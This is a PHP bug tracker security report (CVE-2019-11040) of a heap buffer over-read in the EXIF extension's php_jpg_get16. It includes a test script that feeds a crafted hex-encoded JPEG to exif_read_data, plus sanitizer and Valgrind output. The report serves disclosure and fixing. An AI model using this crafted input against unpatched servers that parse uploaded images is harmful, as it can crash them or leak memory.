php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #77988 heap-buffer-overflow on php_jpg_get16
Submitted: 2019-05-07 22:27 UTC Modified: 2019-07-27 15:13 UTC
From: orestiskourides+php at gmail dot com Assigned: stas (profile)
Status: Closed Package: EXIF related
PHP Version: 7.1.29 OS: Linux
Private report: No CVE-ID: 2019-11040
 [2019-05-07 22:27 UTC] orestiskourides+php at gmail dot com
Description:
------------
==29489==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001715 at pc 0x00000080609e bp 0x7fff9a5e15d0 sp 0x7fff9a5e15c8
READ of size 1 at 0x602000001715 thread T0
    #0 0x80609d in php_jpg_get16 /home/ninja/php/php-7.3.5/ext/exif/exif.c:1437:38
    #1 0x7f3d12 in exif_scan_thumbnail /home/ninja/php/php-7.3.5/ext/exif/exif.c:3923:12
    #2 0x7effa6 in zif_exif_read_data /home/ninja/php/php-7.3.5/ext/exif/exif.c:4581:4
    #3 0x104aa9f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/ninja/php/php-7.3.5/Zend/zend_vm_execute.h:690:2
    #4 0xf2b1d3 in execute_ex /home/ninja/php/php-7.3.5/Zend/zend_vm_execute.h:55334:7
    #5 0xf2b71d in zend_execute /home/ninja/php/php-7.3.5/Zend/zend_vm_execute.h:60881:2
    #6 0xdeb7be in zend_execute_scripts /home/ninja/php/php-7.3.5/Zend/zend.c:1568:4
    #7 0xbe2d4c in php_execute_script /home/ninja/php/php-7.3.5/main/main.c:2630:14
    #8 0x1167fe9 in do_cli /home/ninja/php/php-7.3.5/sapi/cli/php_cli.c:997:5
    #9 0x1165929 in main /home/ninja/php/php-7.3.5/sapi/cli/php_cli.c:1389:18
    #10 0x7fec9e4e0b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #11 0x4388e9 in _start (/home/ninja/php/php-7.3.5/sapi/cli/php+0x4388e9)


Test script:
---------------
<?
$img = fopen("php://memory","r+");
fwrite($img,hex2bin("ffd83000103030303030303030303030303030fffe000e303030303030303030303000fffe000e303030303030303030303000fffe00103030303030303030303030303000ffe102994578696600004d4d002a00000008000282980002000000300000002692860002000000300000004f000000683030303030303030303030300400303030303000303030303030303030303030303030303030303030554e49434f4445003030303030303030303030303030303030000202010004000000010000008602020004000000010000000430303030ffd8ff00027fff30303030303030303030303030ff30008430303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030ffc000303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030305230303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030ff300084303030303000043030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030393030303030303030303030303030303030303030303030303030303030303030303030303030303030ffc00011303030303003303030303030303030ff3000043030ff30013f3030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303029303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030304830303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030ffda000330"));
$test=exif_read_data($img, 'COMMENT', FALSE, TRUE);
?>


Expected result:
----------------
No crash

Actual result:
--------------
==29770== Memcheck, a memory error detector
==29770== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==29770== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==29770== Command: sapi/cli/php test.php
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5E01E8: zend_register_ini_entries (zend_ini.c:261)
==29770==    by 0x566180: php_module_startup (main.c:2275)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x5CD8DD: zend_register_internal_class (zend_API.c:2775)
==29770==    by 0x5CD8DD: zend_register_internal_class_ex (zend_API.c:2747)
==29770==    by 0x5E696A: zend_register_default_exception (zend_exceptions.c:827)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFB26: zval_make_interned_string (zend_API.c:3692)
==29770==    by 0x5CFB26: zend_declare_property_ex (zend_API.c:3713)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFFFE: zend_declare_property_string (zend_API.c:3830)
==29770==    by 0x5E69B6: zend_register_default_exception (zend_exceptions.c:831)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFCC3: zend_declare_property_ex (zend_API.c:3758)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFFFE: zend_declare_property_string (zend_API.c:3830)
==29770==    by 0x5E69D7: zend_register_default_exception (zend_exceptions.c:832)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFCC3: zend_declare_property_ex (zend_API.c:3758)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFF0A: zend_declare_property_long (zend_API.c:3812)
==29770==    by 0x5E69F5: zend_register_default_exception (zend_exceptions.c:833)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFCC3: zend_declare_property_ex (zend_API.c:3758)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFEAA: zend_declare_property_null (zend_API.c:3794)
==29770==    by 0x5E6A10: zend_register_default_exception (zend_exceptions.c:834)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CFD2F: zend_declare_property_ex (zend_API.c:3770)
==29770==    by 0x5CFE56: zend_declare_property (zend_API.c:3783)
==29770==    by 0x5CFFFE: zend_declare_property_string (zend_API.c:3830)
==29770==    by 0x5E6B5F: zend_register_default_exception (zend_exceptions.c:849)
==29770==    by 0x602B3A: zend_register_default_classes (zend_default_classes.c:32)
==29770==    by 0x5DB403: zm_startup_core (zend_builtin_functions.c:307)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5D013F: zval_make_interned_string (zend_API.c:3692)
==29770==    by 0x5D013F: zend_declare_class_constant_ex (zend_API.c:3859)
==29770==    by 0x5D0315: zend_declare_class_constant (zend_API.c:3895)
==29770==    by 0x5D0485: zend_declare_class_constant_stringl (zend_API.c:3942)
==29770==    by 0x41F9B4: date_register_classes (php_date.c:2114)
==29770==    by 0x41F9B4: zm_startup_date (php_date.c:877)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CDA74: do_register_internal_class (zend_API.c:2731)
==29770==    by 0x4CDE4C: zm_startup_reflection (php_reflection.c:6636)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CDE90: zm_startup_reflection (php_reflection.c:6639)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE049: zm_startup_reflection (php_reflection.c:6660)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE0D3: zm_startup_reflection (php_reflection.c:6666)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE2B1: zm_startup_reflection (php_reflection.c:6687)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE3E3: zm_startup_reflection (php_reflection.c:6701)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE48E: zm_startup_reflection (php_reflection.c:6708)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE5A5: zm_startup_reflection (php_reflection.c:6720)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4CE62F: zm_startup_reflection (php_reflection.c:6726)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F05AA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F05AA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F05AA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F05AA: zend_new_interned_string_permanent (zend_string.c:196)
==29770==    by 0x5CCA5F: zend_register_functions (zend_API.c:2283)
==29770==    by 0x5CDA5D: do_register_internal_class (zend_API.c:2727)
==29770==    by 0x4D1BE1: spl_register_std_class (spl_functions.c:44)
==29770==    by 0x4DCD59: zm_startup_spl_array (spl_array.c:2002)
==29770==    by 0x4D19CD: zm_startup_spl (php_spl.c:998)
==29770==    by 0x5CBB8B: zend_startup_module_ex (zend_API.c:1878)
==29770==    by 0x5CBF88: zend_startup_module_zval (zend_API.c:1893)
==29770==    by 0x5D8201: zend_hash_apply (zend_hash.c:1688)
==29770==    by 0x5CBE62: zend_startup_modules (zend_API.c:2004)
==29770==    by 0x566222: php_module_startup (main.c:2333)
==29770==    by 0x67C09B: php_cli_startup (php_cli.c:420)
==29770==    by 0x67AFF2: main (php_cli.c:1356)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F0056: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F0056: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F0056: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F0056: zend_new_interned_string_request (zend_string.c:224)
==29770==    by 0x59F920: zval_make_interned_string (zend_compile.c:473)
==29770==    by 0x59F920: zend_insert_literal (zend_compile.c:485)
==29770==    by 0x59F920: zend_add_literal (zend_compile.c:505)
==29770==    by 0x59F920: zend_emit_op (zend_compile.c:2121)
==29770==    by 0x5A8109: zend_compile_call (zend_compile.c:4042)
==29770==    by 0x5A2F4A: zend_compile_assign (zend_compile.c:2980)
==29770==    by 0x5AB1BE: zend_compile_stmt (zend_compile.c:8309)
==29770==    by 0x5B1A3C: zend_compile_top_stmt (zend_compile.c:8195)
==29770==    by 0x5B1A2B: zend_compile_top_stmt (zend_compile.c:8190)
==29770==    by 0x58A707: zend_compile (zend_language_scanner.l:602)
==29770==    by 0x58A5D5: compile_file (zend_language_scanner.l:636)
==29770==    by 0x5C6A35: zend_execute_scripts (zend.c:1562)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F0056: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F0056: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F0056: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F0056: zend_new_interned_string_request (zend_string.c:224)
==29770==    by 0x59F920: zval_make_interned_string (zend_compile.c:473)
==29770==    by 0x59F920: zend_insert_literal (zend_compile.c:485)
==29770==    by 0x59F920: zend_add_literal (zend_compile.c:505)
==29770==    by 0x59F920: zend_emit_op (zend_compile.c:2121)
==29770==    by 0x5A8109: zend_compile_call (zend_compile.c:4042)
==29770==    by 0x5AB1BE: zend_compile_stmt (zend_compile.c:8309)
==29770==    by 0x5B1A3C: zend_compile_top_stmt (zend_compile.c:8195)
==29770==    by 0x5B1A2B: zend_compile_top_stmt (zend_compile.c:8190)
==29770==    by 0x58A707: zend_compile (zend_language_scanner.l:602)
==29770==    by 0x58A5D5: compile_file (zend_language_scanner.l:636)
==29770==    by 0x5C6A35: zend_execute_scripts (zend.c:1562)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== Conditional jump or move depends on uninitialised value(s)
==29770==    at 0x5F00FA: zend_string_equal_val (zend_string.c:403)
==29770==    by 0x5F00FA: zend_string_equal_content (zend_string.h:310)
==29770==    by 0x5F00FA: zend_interned_string_ht_lookup (zend_string.c:156)
==29770==    by 0x5F00FA: zend_new_interned_string_request (zend_string.c:230)
==29770==    by 0x5A3793: zval_make_interned_string (zend_compile.c:473)
==29770==    by 0x5A3793: zend_try_compile_cv (zend_compile.c:2534)
==29770==    by 0x5A408B: zend_compile_simple_var (zend_compile.c:2606)
==29770==    by 0x5A408B: zend_compile_var (zend_compile.c:8450)
==29770==    by 0x5A5056: zend_compile_args (zend_compile.c:3211)
==29770==    by 0x5A51D0: zend_compile_call_common (zend_compile.c:3314)
==29770==    by 0x5A812A: zend_compile_call (zend_compile.c:4045)
==29770==    by 0x5AB1BE: zend_compile_stmt (zend_compile.c:8309)
==29770==    by 0x5B1A3C: zend_compile_top_stmt (zend_compile.c:8195)
==29770==    by 0x5B1A2B: zend_compile_top_stmt (zend_compile.c:8190)
==29770==    by 0x58A707: zend_compile (zend_language_scanner.l:602)
==29770==    by 0x58A5D5: compile_file (zend_language_scanner.l:636)
==29770==    by 0x5C6A35: zend_execute_scripts (zend.c:1562)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770== 
==29770== Invalid read of size 1
==29770==    at 0x4BCDAB: php_jpg_get16 (exif.c:1437)
==29770==    by 0x4BCDAB: exif_scan_thumbnail (exif.c:3923)
==29770==    by 0x4BB57D: zif_exif_read_data (exif.c:4581)
==29770==    by 0x652772: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==29770==    by 0x608DB7: execute_ex (zend_vm_execute.h:55334)
==29770==    by 0x608F0F: zend_execute (zend_vm_execute.h:60881)
==29770==    by 0x5C6A63: zend_execute_scripts (zend.c:1568)
==29770==    by 0x5672D6: php_execute_script (main.c:2630)
==29770==    by 0x67BE92: do_cli (php_cli.c:997)
==29770==    by 0x67B049: main (php_cli.c:1389)
==29770==  Address 0x645c385 is 0 bytes after a block of size 5 alloc'd
==29770==    at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==29770==    by 0x59D4B8: __zend_malloc (zend_alloc.c:2903)
==29770==    by 0x59D687: _estrndup (zend_alloc.c:2607)
==29770==    by 0x4BE526: exif_thumbnail_extract (exif.c:2942)
==29770==    by 0x4BE526: exif_process_IFD_in_JPEG (exif.c:3620)
==29770==    by 0x4BBEE7: exif_process_TIFF_in_JPEG (exif.c:3666)
==29770==    by 0x4BBEE7: exif_process_APP1 (exif.c:3691)
==29770==    by 0x4BBEE7: exif_scan_JPEG_header (exif.c:3836)
==29770==    by 0x4BBEE7: exif_scan_FILE_header (exif.c:4229)
==29770==    by 0x4BBEE7: exif_read_from_impl (exif.c:4370)
==29770==    by 0x4BBEE7: exif_read_from_stream (exif.c:4387)
==29770==    by 0x4BA86C: zif_exif_read_data (exif.c:4477)
